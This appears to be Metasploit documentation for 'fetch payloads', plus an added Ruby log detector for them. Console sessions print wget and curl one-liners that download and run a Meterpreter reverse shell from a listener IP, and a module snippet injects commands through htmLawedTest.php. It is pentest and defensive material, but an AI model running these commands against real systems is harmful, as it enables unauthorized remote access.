What are Fetch Payloads?
Fetch Payloads are command-based payloads that leverage network-enabled binaries on a remote host to download binary payloads to that remote host. Adapted payloads are just payloads where we have added an additional feature to an existing payload. In this case, you can still use all your favorite binary payloads and transports, but we have also added an optional Fetch Payload adapter that serves the payloads with network binaries and servers. They work similarly to some of the Command Stagers, but are implemented on the payload side rather than the exploit side for easier integration and portability. Fetch Payloads are a quick and easy way to get a session on a target that has a command injection or code execution vulnerability and a known binary capable of downloading and saving a file.
Terminology
In the following documentation, it is helpful to agree on certain terms so we do not confuse ourselves or each other.
- Fetch Payload - The command run on the remote host to retrieve and execute the served payload.
- Fetch Binary - The binary we use on the remote host to download the served payload. Examples are WGET, cURL, or Certutil.
- Fetch Protocol - The protocol used to download the served payload, such as HTTP, HTTPS, or TFTP.
- Fetch Listener - The server hosting the served payload.
- Fetch Handler - The same as Fetch Listener.
- Served Payload - The underlying payload we want to launch. This could also be called the Adapted Payload.
- Served Payload Handler - The handler for the served payload. This is just a standard meterpreter/reverse_tcp or shell_reverse_tcp handler.
Organization
Unlike Command Stagers, which are organized by binary, Fetch Payloads are organized by server. We currently support HTTP, HTTPS, and TFTP servers. After selecting a fetch payload, you can select the binary to run on the remote host to download the served payload before it is executed.
The naming convention for fetch payloads follows the pattern shown in this example: cmd/linux/https/x64/meterpreter/reverse_tcp
This payload does four things: 1) Creates a linux/x64/meterpreter/reverse_tcp ELF binary as the served payload. 2) Serves that payload on an HTTPS server. 3) Starts the handler that the served payload calls back to. 4) Generates a command to run on the remote host that downloads and executes the served payload.
A simple standalone example
The quickest way to understand fetch payloads is to use them and examine the output. For example, let's assume a Linux target that can connect to us over HTTP and has a command execution vulnerability. First, let's look at the payload on its own:
```
msf6 exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_FILENAME      YXeSdwsoEfOH     no        Name to use on remote system when storing payload
   FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port

View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
```
Options
FETCH_COMMAND is the binary we want to run on the remote host to download the served payload. The following options are currently supported: CURL, FTP, TFTP, TNFTP, and WGET on Linux hosts, and CURL, TFTP, and CERTUTIL on Windows hosts. We will talk more about the binaries later.
FETCH_FILENAME is the name under which the executable payload is stored on the remote host. This option is not supported by every binary and must end in .exe on Windows hosts. The default is random.
FETCH_SRVHOST is the IP the server listens on.
FETCH_SRVPORT is the port the server listens on.
FETCH_URIPATH is the URI corresponding to the payload file. The default is deterministic and derived from the underlying payload, so a payload built in msfvenom will match a listener started in the framework, provided the underlying served payload is the same.
FETCH_WRITABLE_DIR is the directory on the remote host where we want to save the served payload before running it. Not all binaries support this value. If you set it for a binary that does not support it, an error is raised.
The remaining options are those of the served payload. In this case, our served payload is linux/x64/meterpreter/reverse_tcp, so our only additional options are LHOST and LPORT. If we had chosen a different served payload, we would have different options.
Generate the Fetch Payload
```
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
FETCH_COMMAND => WGET
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
FETCH_SRVPORT => 8000
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
LHOST => 10.5.135.201
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
LPORT => 4567
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
```
You can see the generated fetch payload: wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &
This command retrieves the served payload, marks it executable, and then runs it on the remote host.
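From the defender's side, the generated command has a very recognizable shape. As an added example (not part of the Metasploit documentation or code base), the Ruby below picks out commands of the form shown above, and the Windows curl/tftp form shown later in the TFTP section, from constructed process-execution log lines and extracts the fetch listener details an analyst would want; the assumption that a Linux curl variant uses the same `curl -so <file> <url>` shape is mine.

```ruby
# Added example, not Metasploit's own code: recognise fetch-payload style
# download-and-execute commands in process logs and extract listener details.
require 'uri'

# Shapes documented above:
#   wget -qO ./<file> http://<host>:<port>/<uri>; chmod +x ./<file>; ./<file> &
#   curl -so <file>.exe tftp://<host>:<port>/<uri> & start /B <file>.exe
# Assumption: a Linux curl variant uses the same "curl -so <file> <url>" shape.
FETCH_RE = %r{
  \b(?<bin>wget|curl)\s+
  (?:-qO|-so)\s+(?<file>\S+)\s+
  (?<url>(?:https?|tftp)://[^\s;&"]+)
}x

# The follow-on execution step on either platform.
EXEC_RE = %r{chmod\s+\+x|start\s+/B}

# Returns a hash describing the fetch, or nil if the line does not match.
def parse_fetch_command(line)
  m = FETCH_RE.match(line)
  return nil unless m

  uri = URI.parse(m[:url]) # URI::Generic handles tftp:// host and port too
  {
    binary: m[:bin],
    protocol: uri.scheme,
    host: uri.host,
    port: uri.port,
    uri_path: uri.path,
    filename: m[:file].sub(%r{\A\./}, ''),
    executes: !EXEC_RE.match(line).nil?
  }
rescue URI::InvalidURIError
  nil
end

# Constructed sample log lines, not real telemetry. Values mirror the
# documentation's examples; the third line is a benign download for contrast.
SAMPLE_LOG = [
  'host=web01 cmd="wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &"',
  'host=ws07 cmd="curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe"',
  'host=web01 cmd="wget -q https://example.invalid/index.html"'
].freeze

# Returns only the lines that look like fetch payloads, already parsed.
def scan_log(lines)
  lines.map { |l| parse_fetch_command(l) }.compact
end

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG).each { |hit| puts hit.inspect }
end
```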
Start the Fetch Server
When you start the Fetch Handler, it also starts the server hosting the binary contents and the listener for the served payload. With verbose set to true, you can see that both the fetch handler and the served payload handler are running:
```
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
[*] wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &
[*] Payload Handler Started as Job 0
[*] Fetch Handler listening on 10.5.135.201:8000
[*] HTTP server started
[*] Started reverse TCP handler on 10.5.135.201:4567
```
Fetch Handler and Served Payload Handler
The fetch handler is maintained by the served payload handler, so below only the served payload handler is tracked as a job, even though the fetch handler is listening:
```
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l

Jobs
====

  Id  Name                    Payload                                     Payload opts
  --  ----                    -------                                     ------------
  0   Exploit: multi/handler  cmd/linux/http/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4567

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
[*] exec: netstat -ant | grep 8000

tcp        0      0 10.5.135.201:8000       0.0.0.0:*               LISTEN
```
Killing the served payload handler also kills the fetch handler:
```
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
[*] Stopping the following job(s): 0
[*] Stopping job 0
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
[*] exec: netstat -ant | grep 8000

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
```
Using Fetch Payloads on the Fly
The nice thing about Fetch Payloads is that they let you run a binary payload very quickly without relying on an in-framework session or pushing the payload to the target yourself. If you have a shell session, or even just an awkward situation where you can run commands, you can quickly get a session in the framework without manually uploading the payload. Just follow the steps above and run the generated command. We currently only serve in-framework payloads, but in the future it would be relatively trivial to extend this to serving and executing arbitrary executable binaries.
Using in an Exploit
Using Fetch Payloads is no different from using any other command payload. First, give users access to the platform-specific fetch payloads by adding a target that supports ARCH_CMD and the platform of interest, Windows or Linux. Once the target is added, you can access the command by calling payload.encoded and use it as the command to execute on the remote target.
Example with CmdStager
There is likely to be some overlap between fetch payloads and command stagers. Let's briefly go over how you can support both in one exploit. See the Command Stager documentation for the required imports and details of Command Stager. Here I am only documenting the changes needed to make fetch payloads work alongside command stagers, or to use command-type payloads, which I recommend.
In this case, I have modified the code from the command stager documentation to support Linux and Unix command payloads. I simply specified the Platform field and changed the Type to something more generic:
```ruby
'Targets' => [
  [
    'Linux Command',
    {
      'Arch' => [ ARCH_CMD ],
      'Platform' => [ 'Unix', 'Linux' ],
      'Type' => :nix_cmd
    }
  ]
]
```
The execute_command method does not change:
```ruby
def execute_command(cmd, _opts = {})
  # Fetch the session id and CSRF token from the target on first use
  fill_values if @sid.nil? || @token.nil?
  uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
  send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri(uri),
    'cookie' => 'sid=' + @sid,
    'ctype' => 'application/x-www-form-urlencoded',
    'encode_params' => true,
    'vars_post' => {
      'token' => @token,
      'text' => cmd,
      'hhook' => 'exec',
      'sid' => @sid
    }
  })
end
```
The only change to the exploit method is using the more generic Type value in the case statement. Otherwise, nothing needs to change.
```ruby
def exploit
  print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
  case target['Type']
  when :nix_cmd
    # Command payloads, including fetch payloads: run the generated command as-is
    execute_command(payload.encoded)
  when :linux_dropper
    # Binary payloads: hand off to the command stager
    execute_cmdstager
  end
end
```
If you have an exploit that already supports Unix Command payloads and you want it to also support Linux Command payloads such as Fetch Payloads, you can just add the Linux value to the Platform field:
```ruby
'Unix Command', {
  'Platform' => [ 'Unix', 'Linux' ],
  'Arch' => ARCH_CMD,
  'Type' => :unix_cmd,
}
```
Supported Commands
Windows and Linux
CURL
cURL ships preinstalled on Windows 10 and 11 and is extremely common on Linux platforms. Its options are very standard across versions and platforms, which makes cURL a good default choice for both Linux and Windows targets. The cURL command supports all options and all server protocol types.
TFTP
The TFTP binary is only useful in edge cases because of a long list of limitations: 1) It is a Windows feature, but it is disabled by default on Windows Vista and later. 2) While you will likely find it on Linux and Unix hosts, its options are not standardized across versions. 3) The TFTP binary shipped on many Linux systems and on all Windows systems allows neither port configuration nor target filename configuration, so FETCH_SRVPORT must always be set to 69 and FETCH_WRITABLE_DIR and FETCH_FILENAME must be empty. Listening on port 69 in the framework can be problematic, so I recommend using the advanced option FetchListenerBindPort to run the server on a different port and redirect the connection to that high port with a tool like iptables. For example, on a Linux host with iptables, you can run the following commands to redirect UDP port 69 to UDP port 3069:
```
sudo iptables -t nat -I PREROUTING -p udp --dport 69 -j REDIRECT --to-ports 3069
sudo iptables -t nat -I OUTPUT -p udp -d 127.0.0.1 --dport 69 -j REDIRECT --to-ports 3069
```
Then you can set FetchListenerBindPort to 3069 and the callback will work properly. 4) Because TFTP is a UDP-based protocol, and because of the server implementation within the framework, a new service is started every time you launch the TFTP fetch handler:
```
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs

Jobs
====

  Id  Name                    Payload                                       Payload opts
  --  ----                    -------                                       ------------
  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444

msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
LPORT => 4445
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe
[*] Payload Handler Started as Job 4
[*] Starting TFTP server on 10.5.135.201:8080
[*] Started reverse TCP handler on 10.5.135.201:4445
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs

Jobs
====

  Id  Name                    Payload                                       Payload opts
  --  ----                    -------                                       ------------
  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444
  4   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4445

msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
[*] exec: netstat -an | grep 8080

udp        0      0 10.5.135.201:8080       0.0.0.0:*
udp        0      0 10.5.135.201:8080       0.0.0.0:*
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
FETCH_URIPATH => test4
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
LPORT => 8547
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe
[*] Payload Handler Started as Job 5
[*] Starting TFTP server on 10.5.135.201:8080
[*] Started reverse TCP handler on 10.5.135.201:8547
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
[*] exec: netstat -an | grep 8080

udp        0      0 10.5.135.201:8080       0.0.0.0:*
udp        0      0 10.5.135.201:8080       0.0.0.0:*
udp        0      0 10.5.135.201:8080       0.0.0.0:*
```
Nothing prevents you from creating a race condition by running multiple TFTP servers with the same IP, port, and FETCH_URIPATH value but different payloads. The result is a race condition where the served payload is non-deterministic.
Windows Only
Certutil
Certutil is a good choice for Windows targets: it is likely to be present in current versions of Windows and is highly configurable. The only problematic aspect is that certutil has no insecure mode, so if you use Certutil with the HTTPS protocol, the certificate must be valid and verifiable. It supports the HTTP and HTTPS protocols.
Linux Only
FTP
FTP is an old but useful binary. Although we support using the FTP binary, we do not provide an FTP server. Modern versions of FTP support both the HTTP and HTTPS protocols. Unfortunately, we only support these modern versions of inline FTP, so it may not be suitable for older systems.
TNFTP
TNFTP (not to be confused with TFTP) is a newer version of FTP. It is exactly the same as modern FTP, but sometimes old FTP and TNFTP both exist on a system, hence the tnftp command instead of ftp.
WGET
WGET is probably the first choice for Linux-only targets. It supports HTTPS and HTTP and all fetch payload options. It is ubiquitous on Linux hosts and very standard, making it a great choice.